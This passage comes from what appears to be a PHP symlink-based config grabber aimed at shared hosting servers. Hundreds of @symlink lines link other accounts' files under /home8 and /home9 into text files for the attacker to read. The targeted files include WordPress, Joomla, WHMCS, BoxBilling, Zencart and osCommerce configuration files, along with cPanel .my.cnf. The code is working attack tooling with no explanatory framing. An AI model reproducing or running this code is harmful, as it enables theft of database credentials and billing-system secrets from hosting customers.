  2299. @symlink('/home8/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2300. @symlink('/home8/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2301. @symlink('/home8/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2302. @symlink('/home8/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2303. @symlink('/home8/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2304. @symlink('/home8/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2305. @symlink('/home8/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2306. @symlink('/home8/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2307. @symlink('/home8/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2308. @symlink('/home8/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2309. @symlink('/home8/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2310. @symlink('/home8/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2311. @symlink('/home8/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2312. @symlink('/home8/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2313. @symlink('/home8/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2314. @symlink('/home8/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2315. @symlink('/home8/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2316. @symlink('/home8/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2317. @symlink('/home8/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2318. @symlink('/home8/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2319. @symlink('/home8/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2320. @symlink('/home8/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2321. @symlink('/home8/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2322. @symlink('/home8/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2323. @symlink('/home8/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2324. @symlink('/home8/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2325. @symlink('/home8/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2326. @symlink('/home8/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2327. @symlink('/home8/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2328. @symlink('/home8/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2329. @symlink('/home8/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2330. @symlink('/home8/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2331. @symlink('/home8/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2332. @symlink('/home8/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2333. @symlink('/home8/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2334. @symlink('/home8/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2335. @symlink('/home8/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2336. @symlink('/home8/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2337. @symlink('/home8/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2338. @symlink('/home8/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2339. @symlink('/home8/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2340. @symlink('/home8/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2341. @symlink('/home8/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2342. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2343. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2344. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2345. @symlink('/home8/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2346. @symlink('/home8/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2347. @symlink('/home8/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2348. @symlink('/home8/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2349. @symlink('/home8/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2350. @symlink('/home8/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2351. @symlink('/home8/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2352. @symlink('/home8/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2353. @symlink('/home8/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2354. @symlink('/home8/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2355. @symlink('/home8/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2356. @symlink('/home8/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2357. @symlink('/home8/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2358. @symlink('/home8/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2359. @symlink('/home8/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2360. @symlink('/home8/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2361. @symlink('/home8/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2362. @symlink('/home8/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2363. @symlink('/home8/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2364. @symlink('/home8/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2365. @symlink('/home8/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2366. @symlink('/home8/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2367. @symlink('/home8/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2368. @symlink('/home8/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2369. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2370. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2371. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2372. @symlink('/home8/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2373. @symlink('/home8/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2374. @symlink('/home8/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2375. @symlink('/home8/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2376. @symlink('/home8/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2377. @symlink('/home8/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2378. @symlink('/home8/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2379. @symlink('/home8/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2380. @symlink('/home8/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2381. @symlink('/home8/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2382. @symlink('/home8/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2383. @symlink('/home8/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2384. @symlink('/home8/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2385. @symlink('/home8/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2386. @symlink('/home8/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2387. @symlink('/home8/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2388. @symlink('/home8/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2389. @symlink('/home8/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2390. @symlink('/home8/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2391. @symlink('/home8/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2392. @symlink('/home8/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2393. @symlink('/home8/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2394. @symlink('/home8/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2395. @symlink('/home8/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2396. @symlink('/home8/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2397. @symlink('/home8/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2398. @symlink('/home8/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2399. @symlink('/home8/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2400. @symlink('/home8/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2401. @symlink('/home8/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2402. @symlink('/home8/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2403. @symlink('/home8/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2404. @symlink('/home8/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2405. @symlink('/home8/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2406. @symlink('/home8/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2407. @symlink('/home8/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2408. @symlink('/home8/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2409. @symlink('/home8/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2410. @symlink('/home8/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2411. @symlink('/home8/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2412. @symlink('/home8/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2413. @symlink('/home8/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2414. @symlink('/home8/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2415. @symlink('/home8/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2416. @symlink('/home8/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2417. @symlink('/home8/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2418. @symlink('/home8/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2419. @symlink('/home8/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2420. @symlink('/home8/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2421. @symlink('/home8/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2422. @symlink('/home8/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2423. @symlink('/home8/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2424. @symlink('/home8/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2425.  
  2426. //home 9
  2427.  
  2428. @symlink('/home9/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2429. @symlink('/home9/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2430. @symlink('/home9/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2431. @symlink('/home9/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2432. @symlink('/home9/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2433. @symlink('/home9/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2434. @symlink('/home9/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2435. @symlink('/home9/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2436. @symlink('/home9/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2437. @symlink('/home9/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2438. @symlink('/home9/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2439. @symlink('/home9/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2440. @symlink('/home9/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2441. @symlink('/home9/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2442. @symlink('/home9/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2443. @symlink('/home9/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2444. @symlink('/home9/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2445. @symlink('/home9/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2446. @symlink('/home9/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2447. @symlink('/home9/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2448. @symlink('/home9/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2449. @symlink('/home9/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2450. @symlink('/home9/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2451. @symlink('/home9/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2452. @symlink('/home9/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2453. @symlink('/home9/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2454. @symlink('/home9/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2455. @symlink('/home9/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2456. @symlink('/home9/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2457. @symlink('/home9/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2458. @symlink('/home9/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2459. @symlink('/home9/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2460. @symlink('/home9/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2461. @symlink('/home9/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2462. @symlink('/home9/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2463. @symlink('/home9/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2464. @symlink('/home9/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2465. @symlink('/home9/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2466. @symlink('/home9/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2467. @symlink('/home9/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2468. @symlink('/home9/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2469. @symlink('/home9/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2470. @symlink('/home9/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2471. @symlink('/home9/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2472. @symlink('/home9/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2473. @symlink('/home9/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2474. @symlink('/home9/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2475. @symlink('/home9/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2476. @symlink('/home9/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2477. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2478. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2479. @symlink('/home9/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2480. @symlink('/home9/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2481. @symlink('/home9/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2482. @symlink('/home9/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2483. @symlink('/home9/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2484. @symlink('/home9/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2485. @symlink('/home9/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2486. @symlink('/home9/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2487. @symlink('/home9/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2488. @symlink('/home9/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2489. @symlink('/home9/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2490. @symlink('/home9/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2491. @symlink('/home9/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2492. @symlink('/home9/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2493. @symlink('/home9/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2494. @symlink('/home9/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2495. @symlink('/home9/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2496. @symlink('/home9/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2497. @symlink('/home9/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2498. @symlink('/home9/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2499. @symlink('/home9/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2500. @symlink('/home9/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2501. @symlink('/home9/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2502. @symlink('/home9/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2503. @symlink('/home9/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2504. @symlink('/home9/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2505. @symlink('/home9/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2506. @symlink('/home9/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2507. @symlink('/home9/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2508. @symlink('/home9/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2509. @symlink('/home9/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2510. @symlink('/home9/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2511. @symlink('/home9/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2512. @symlink('/home9/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2513. @symlink('/home9/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2514. @symlink('/home9/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2515. @symlink('/home9/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2516. @symlink('/home9/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2517. @symlink('/home9/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2518. @symlink('/home9/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2519. @symlink('/home9/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2520. @symlink('/home9/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2521. @symlink('/home9/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2522. @symlink('/home9/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2523. @symlink('/home9/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2524. @symlink('/home9/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2525. @symlink('/home9/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2526. @symlink('/home9/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2527. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2528. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2529. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2530. @symlink('/home9/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2531. @symlink('/home9/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2532. @symlink('/home9/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2533. @symlink('/home9/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2534. @symlink('/home9/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2535. @symlink('/home9/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2536. @symlink('/home9/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2537. @symlink('/home9/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2538. @symlink('/home9/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2539. @symlink('/home9/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2540. @symlink('/home9/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2541. @symlink('/home9/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2542. @symlink('/home9/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2543. @symlink('/home9/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2544. @symlink('/home9/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2545. @symlink('/home9/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2546. @symlink('/home9/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2547. @symlink('/home9/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2548. @symlink('/home9/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2549. @symlink('/home9/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2550. @symlink('/home9/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2551. @symlink('/home9/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2552. @symlink('/home9/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2553. @symlink('/home9/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2554. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2555. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2556. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2557. @symlink('/home9/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2558. @symlink('/home9/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2559. @symlink('/home9/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2560. @symlink('/home9/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2561. @symlink('/home9/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2562. @symlink('/home9/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2563. @symlink('/home9/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2564. @symlink('/home9/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2565. @symlink('/home9/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2566. @symlink('/home9/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2567. @symlink('/home9/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2568. @symlink('/home9/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2569. @symlink('/home9/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2570. @symlink('/home9/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2571. @symlink('/home9/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2572. @symlink('/home9/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2573. @symlink('/home9/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2574. @symlink('/home9/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2575. @symlink('/home9/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2576. @symlink('/home9/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2577. @symlink('/home9/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2578. @symlink('/home9/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2579. @symlink('/home9/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2580. @symlink('/home9/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2581. @symlink('/home9/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2582. @symlink('/home9/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2583. @symlink('/home9/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2584. @symlink('/home9/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2585. @symlink('/home9/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2586. @symlink('/home9/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2587. @symlink('/home9/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2588. @symlink('/home9/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2589. @symlink('/home9/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2590. @symlink('/home9/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2591. @symlink('/home9/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2592. @symlink('/home9/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2593. @symlink('/home9/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2594. @symlink('/home9/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2595. @symlink('/home9/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2596. @symlink('/home9/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2597. @symlink('/home9/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2598. @symlink('/home9/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2599. @symlink('/home9/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2600. @symlink('/home9/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2601. @symlink('/home9/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2602. @symlink('/home9/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2603. @symlink('/home9/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
